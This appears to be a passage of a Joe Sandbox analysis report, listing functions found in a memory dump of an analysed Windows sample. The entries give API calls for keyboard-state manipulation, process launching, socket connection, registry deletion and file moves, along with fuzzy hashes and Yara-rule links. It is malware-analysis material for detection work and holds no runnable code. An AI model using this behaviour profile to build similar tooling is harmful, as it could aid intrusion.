                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                          • String ID:
                                                                                                          • API String ID: 4072528602-0
                                                                                                          • Opcode ID: 242b7fe149615cac74f2d92e0e3d5f417dc0c90838ef997f72afbcdef1153c69
                                                                                                          • Instruction ID: 3140b5b46fd731bfbb284443dbdcbdf5cbdccdaa549b6c7bbfb080a30b64be5c
                                                                                                          • Opcode Fuzzy Hash: 242b7fe149615cac74f2d92e0e3d5f417dc0c90838ef997f72afbcdef1153c69
                                                                                                          • Instruction Fuzzy Hash: 2071DF34A04205AFDB209F54CA96FFABBB9EF09304F14509DF995B7291C732AC52DB50
                                                                                                          Function 00EBFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EBFB31
                                                                                                          • _memset.LIBCMT ref: 00EBFBFA
                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00EBFC3F
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                            • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 00EBFCB6
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBFCE5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3522835683-2766056989
                                                                                                          • Opcode ID: 391d29de8c74c669e416708f0a0e9995addff67b427659cf1070352c618dd41b
                                                                                                          • Instruction ID: 500b60182a2d66e170a6b606a4af1141bdfafa0c85061cdea417a2ddd02deb4b
                                                                                                          • Opcode Fuzzy Hash: 391d29de8c74c669e416708f0a0e9995addff67b427659cf1070352c618dd41b
                                                                                                          • Instruction Fuzzy Hash: 16619EB5A006199FCB14EF94D891AAEFBF4FF48314F149469E846BB391CB30AD41CB94
                                                                                                          Function 00EA174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 00EA178B
                                                                                                          • GetKeyboardState.USER32(?), ref: 00EA17A0
                                                                                                          • SetKeyboardState.USER32(?), ref: 00EA1801
                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EA182F
                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EA184E
                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EA1894
                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EA18B7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: bb2fc4332aba475f176c1855787b7286ecbe8d722e525faad069d88d47a0174f
                                                                                                          • Instruction ID: e0b3897fd656b196a3a533407bc68629a6a2ed817f8472e89aa6f9ae31e6b258
                                                                                                          • Opcode Fuzzy Hash: bb2fc4332aba475f176c1855787b7286ecbe8d722e525faad069d88d47a0174f
                                                                                                          • Instruction Fuzzy Hash: 8351B4609087D53EFB368224C855BBA7EE95B0B308F0C65C9F1D96E8D2D298FC94D750
                                                                                                          Function 00EA1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(00000000), ref: 00EA15A4
                                                                                                          • GetKeyboardState.USER32(?), ref: 00EA15B9
                                                                                                          • SetKeyboardState.USER32(?), ref: 00EA161A
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EA1646
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EA1663
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EA16A7
                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EA16C8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 66ed0c36085a54d8d4785e474557d9f5e3f72e4f8032eea4b518a863777b2a9d
                                                                                                          • Instruction ID: 90898866b1128486295eaae611beae8db31ea8ce76750d735f728583f6f5c17d
                                                                                                          • Opcode Fuzzy Hash: 66ed0c36085a54d8d4785e474557d9f5e3f72e4f8032eea4b518a863777b2a9d
                                                                                                          • Instruction Fuzzy Hash: F351E4A09047D53DFB3287648C05BBA7EE95F4B308F0C64C9E0D9AE8C2C694BC98E751
                                                                                                          Function 00EA5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy$LocalTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 2945705084-0
                                                                                                          • Opcode ID: 17497db3ded68b14f09a10e339492248dd57a9c90f8385a58783906c6dc3b045
                                                                                                          • Instruction ID: 8c091f650d72bf1fcca1914d345dec649722ff5491c16f71c89070352b56ff76
                                                                                                          • Opcode Fuzzy Hash: 17497db3ded68b14f09a10e339492248dd57a9c90f8385a58783906c6dc3b045
                                                                                                          • Instruction Fuzzy Hash: E741ACA6CA161875CB11FBB4D84A9CFB3F8AF09350F11A866E909F3161E634E21583A5
                                                                                                          Function 00EA3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BE0
                                                                                                            • Part of subcall function 00EA4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EA3B8A,?), ref: 00EA4BF9
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00EA3BAA
                                                                                                          • _wcscmp.LIBCMT ref: 00EA3BC6
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00EA3BDE
                                                                                                          • _wcscat.LIBCMT ref: 00EA3C26
                                                                                                          • SHFileOperationW.SHELL32(?), ref: 00EA3C92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 1377345388-1173974218
                                                                                                          • Opcode ID: 3d6b0d0159c2325d5fa6f8f21f2b4f7025ddc55e5d8602cc91d7a5e03b8305c1
                                                                                                          • Instruction ID: 7c090cb1566fcd58ec8cfcb9776f32647a2901564b7a47900558cbc21ea2f444
                                                                                                          • Opcode Fuzzy Hash: 3d6b0d0159c2325d5fa6f8f21f2b4f7025ddc55e5d8602cc91d7a5e03b8305c1
                                                                                                          • Instruction Fuzzy Hash: F7419E715083449EC752EB74D841ADBB7E8AF8D340F50292EF489E7191EB34E648C762
                                                                                                          Function 00EC78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EC78CF
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC7976
                                                                                                          • IsMenu.USER32(?), ref: 00EC798E
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC79D6
                                                                                                          • DrawMenuBar.USER32 ref: 00EC79E9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3866635326-4108050209
                                                                                                          • Opcode ID: e8edb96d1c5e375035617d974310345c9397f617e080d4c22211552a09691143
                                                                                                          • Instruction ID: 64a4339fd66467d5540a89879484aefec58f52a1cbe58765f8e1039467caeaa7
                                                                                                          • Opcode Fuzzy Hash: e8edb96d1c5e375035617d974310345c9397f617e080d4c22211552a09691143
                                                                                                          • Instruction Fuzzy Hash: E4416571A08208EFDB20DF54E984FAABBF9FB49314F059169E985A7250C731ED51CFA0
                                                                                                          Function 00EC1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EC1631
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EC165B
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00EC1712
                                                                                                            • Part of subcall function 00EC1602: RegCloseKey.ADVAPI32(?), ref: 00EC1678
                                                                                                            • Part of subcall function 00EC1602: FreeLibrary.KERNEL32(?), ref: 00EC16CA
                                                                                                            • Part of subcall function 00EC1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EC16ED
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EC16B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 395352322-0
                                                                                                          • Opcode ID: c6b220002a79112239593dca2542036a8c597ef1cd5b993383b3755370e7528b
                                                                                                          • Instruction ID: cc3f9faecdfa7fc1b8c568a47df5580e658ad4c823f2352319b4bd1d1067d796
                                                                                                          • Opcode Fuzzy Hash: c6b220002a79112239593dca2542036a8c597ef1cd5b993383b3755370e7528b
                                                                                                          • Instruction Fuzzy Hash: 42314D71901109BFDB149B90DD85FFEB7BCEF0A304F1411AEE515F2141EA719E4A9BA0
                                                                                                          Function 00EC68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EC6911
                                                                                                          • GetWindowLongW.USER32(010C5680,000000F0), ref: 00EC6944
                                                                                                          • GetWindowLongW.USER32(010C5680,000000F0), ref: 00EC6979
                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EC69AB
                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EC69D5
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC69E6
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC6A00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2178440468-0
                                                                                                          • Opcode ID: 658414e95dda0825b76f3de26c97318d72293a5b21518c9393aae48c651c70bd
                                                                                                          • Instruction ID: 34bab6b322e92c73f3ebe82092d91d9933397b112681f3125810c335ed0550fb
                                                                                                          • Opcode Fuzzy Hash: 658414e95dda0825b76f3de26c97318d72293a5b21518c9393aae48c651c70bd
                                                                                                          • Instruction Fuzzy Hash: 803137306042549FDB21CF19DE88F6637E1FB89318F2851A8F515AF2B1CB72AC46DB40
                                                                                                          Function 00E9E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E2CA
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E2F0
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E9E2F3
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00E9E311
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00E9E31A
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00E9E33F
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00E9E34D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 3dd9027e8cf34551dd7e616e8e120b82259a31131accab4f989df1162168380f
                                                                                                          • Instruction ID: 3edeb4331b422ae18f2e825924207f3b63df8139e99d9443ee0362a63da950d2
                                                                                                          • Opcode Fuzzy Hash: 3dd9027e8cf34551dd7e616e8e120b82259a31131accab4f989df1162168380f
                                                                                                          • Instruction Fuzzy Hash: 68219776605219BF9F50DFA9DC88DBF77ACEB08364B484125FA18EB350D670DC458760
                                                                                                          Function 00EB685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EB8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EB84A0
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EB68B1
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00EB68C0
                                                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EB68F9
                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00EB6902
                                                                                                          • WSAGetLastError.WSOCK32 ref: 00EB690C
                                                                                                          • closesocket.WSOCK32(00000000), ref: 00EB6935
                                                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EB694E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 910771015-0
                                                                                                          • Opcode ID: 210ba0d6c96777293762303cf3a300b1d5722dd41a983b01e3bbc9d4d060e7a4
                                                                                                          • Instruction ID: ca27cfa70d54f786f6b5311a29ad897e2bad38f8a90feba65f8be3fd07089ae3
                                                                                                          • Opcode Fuzzy Hash: 210ba0d6c96777293762303cf3a300b1d5722dd41a983b01e3bbc9d4d060e7a4
                                                                                                          • Instruction Fuzzy Hash: 5631B171600208AFDB14AF64DC85FFE77E9EB44724F04502AFD05BB291CB74AD048BA1
                                                                                                          Function 00E9E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E3A5
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E3CB
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E9E3CE
                                                                                                          • SysAllocString.OLEAUT32 ref: 00E9E3EF
                                                                                                          • SysFreeString.OLEAUT32 ref: 00E9E3F8
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00E9E412
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00E9E420
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 411f2f5f1b70cde830d4cedd360545833bcb0d338c5481157eeeb1a714b28a15
                                                                                                          • Instruction ID: 5c92c4e50366896c9ed584f76bee80dffb04b85cf5c8588ba11c365bc478859a
                                                                                                          • Opcode Fuzzy Hash: 411f2f5f1b70cde830d4cedd360545833bcb0d338c5481157eeeb1a714b28a15
                                                                                                          • Instruction Fuzzy Hash: DE218835605104BF9F50DFA9DC88DAF77ECEB48364B048125FA15EB360D670EC4587A4
                                                                                                          Function 00EC7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
                                                                                                            • Part of subcall function 00E42111: GetStockObject.GDI32(00000011), ref: 00E42163
                                                                                                            • Part of subcall function 00E42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EC7C57
                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EC7C64
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EC7C6F
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EC7C7E
                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EC7C8A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                          • Opcode ID: aa726f4ebb5fd971ebe52c2b356677d8d05257683948742efb915fe4a0aa9937
                                                                                                          • Instruction ID: 117917f32cbd121ace371cf4314b12669a2b629c3bde58e6351ba5b6eacdbad2
                                                                                                          • Opcode Fuzzy Hash: aa726f4ebb5fd971ebe52c2b356677d8d05257683948742efb915fe4a0aa9937
                                                                                                          • Instruction Fuzzy Hash: 981190B214021EBEEF159F60CC85EEBBF5DEF08798F015115BB48A6090C672AC21DBA0
                                                                                                          Function 00E641B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E64282,?), ref: 00E641D3
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00E641DA
                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00E641E6
                                                                                                          • DecodePointer.KERNEL32(00000001,00E64282,?), ref: 00E64203
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
